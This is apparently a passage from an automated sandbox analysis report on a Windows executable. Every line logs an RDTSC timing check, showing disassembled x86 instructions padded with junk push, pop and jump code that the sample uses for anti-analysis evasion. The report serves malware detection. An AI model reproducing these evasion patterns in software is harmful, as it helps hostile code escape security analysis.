Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85D76 second address: C85D9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F43E8C1FDDDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85D9D second address: C85DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85EDC second address: C85EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85EE2 second address: C85EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C85EE6 second address: C85F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43E8C1FDE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F43E8C1FDD6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8602B second address: C8602F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8602F second address: C86041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8646F second address: C86474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C86474 second address: C8647F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F43E8C1FDD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8AD35 second address: C8AD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8AD3B second address: C8AD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8B1DE second address: C8B1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8B4B5 second address: C8B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8B4B9 second address: C8B4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C8B4CF second address: C8B4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C913CE second address: C913D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C913D7 second address: C913E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C916A9 second address: C916AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C916AD second address: C916B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C916B3 second address: C916C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F43E91C545Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9180C second address: C91821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C91821 second address: C9182D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43E91C545Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9182D second address: C91839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C91839 second address: C9183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9183D second address: C91849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43E8C1FDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C91849 second address: C91853 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E91C545Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C92BF6 second address: C92C08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C92D04 second address: C92D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E91C545Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C92D1F second address: C92D2C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9330A second address: C93311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93311 second address: C9334B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F43E8C1FDDCh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F43E8C1FDDBh 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F43E8C1FDE7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9334B second address: C93368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F43E91C5456h 0x00000009 ja 00007F43E91C5456h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F43E91C5458h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93368 second address: C93382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C934E3 second address: C934E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C935A8 second address: C935BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93761 second address: C93765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93765 second address: C9377F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F43E8C1FDE8h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F43E8C1FDD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93DA9 second address: C93DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F43E91C5456h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93DBB second address: C93DC5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43E8C1FDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93DC5 second address: C93DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C93DCA second address: C93E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 or dword ptr [ebp+122D1C28h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F43E8C1FDD8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a jp 00007F43E8C1FDDCh 0x00000030 mov edi, dword ptr [ebp+122D19CEh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F43E8C1FDD8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 mov edi, eax 0x00000054 jbe 00007F43E8C1FDDBh 0x0000005a and di, 6200h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push ebx 0x00000063 jo 00007F43E8C1FDD6h 0x00000069 pop ebx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C94894 second address: C9489A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C9489A second address: C948B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C948B1 second address: C948B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C957D9 second address: C957DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C96C8C second address: C96C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C96C92 second address: C96C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C97763 second address: C97767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C97767 second address: C9776D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C98FAB second address: C98FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C98FAF second address: C98FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe | RDTSC instruction interceptor: First address: C98FB4 second address: C98FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43E91C5460h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98FD1 second address: C98FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F43E8C1FDE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C98D43 second address: C98D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F43E91C5468h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9AC2D second address: C9AC45 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43E8C1FDD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F43E8C1FDDCh 0x00000012 jbe 00007F43E8C1FDD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA74 second address: C9DA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F43E91C5456h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jnc 00007F43E91C545Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA8C second address: C9DA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9DA94 second address: C9DA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9F909 second address: C9F90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9F90E second address: C9F91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9E9E0 second address: C9E9F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43E8C1FDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d ja 00007F43E8C1FDD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA0901 second address: CA090B instructions: 0x00000000 rdtsc 0x00000002 je 00007F43E91C545Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA090B second address: CA091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F43E8C1FDD8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA091C second address: CA099E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F43E91C5458h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F43E91C5458h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 call 00007F43E91C545Eh 0x00000045 mov dword ptr [ebp+12472CE9h], edi 0x0000004b pop edi 0x0000004c push 00000000h 0x0000004e mov ebx, 769CCC4Ch 0x00000053 push eax 0x00000054 push edi 0x00000055 push eax 0x00000056 push edx 0x00000057 jnl 00007F43E91C5456h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FA2F second address: C9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FA33 second address: C9FAE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F43E91C5458h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F43E91C5458h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+124454D6h], eax 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov dword ptr [ebp+124668C0h], esi 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov di, E601h 0x0000004b mov dword ptr [ebp+122D354Bh], eax 0x00000051 mov eax, dword ptr [ebp+122D066Dh] 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F43E91C5458h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 00000015h 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 mov edi, esi 0x00000073 jnl 00007F43E91C545Ch 0x00000079 push FFFFFFFFh 0x0000007b clc 0x0000007c nop 0x0000007d push eax 0x0000007e pushad 0x0000007f jmp 00007F43E91C5465h 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: C9FAE0 second address: C9FAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA18FA second address: CA19A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F43E91C5467h 0x0000000f jno 00007F43E91C545Ch 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F43E91C5458h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push edi 0x00000033 mov dword ptr [ebp+122D1C28h], eax 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F43E91C5458h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 or edi, dword ptr [ebp+122D28C3h] 0x0000005c xchg eax, esi 0x0000005d jno 00007F43E91C545Eh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jnl 00007F43E91C546Bh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA19A9 second address: CA19AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA19AF second address: CA19B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA1C22 second address: CA1C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA1C26 second address: CA1C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA37CE second address: CA384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F43E8C1FDDFh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F43E8C1FDD8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 movsx edi, cx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F43E8C1FDD8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D326Fh], ebx 0x0000004b push 00000000h 0x0000004d mov ebx, dword ptr [ebp+122D2B63h] 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F43E8C1FDE2h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA384F second address: CA385A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F43E91C5456h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA385A second address: CA3876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43E8C1FDE0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3876 second address: CA387A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA387A second address: CA3880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3880 second address: CA3885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CA3A93 second address: CA3A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: CAA523 second address: CAA527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
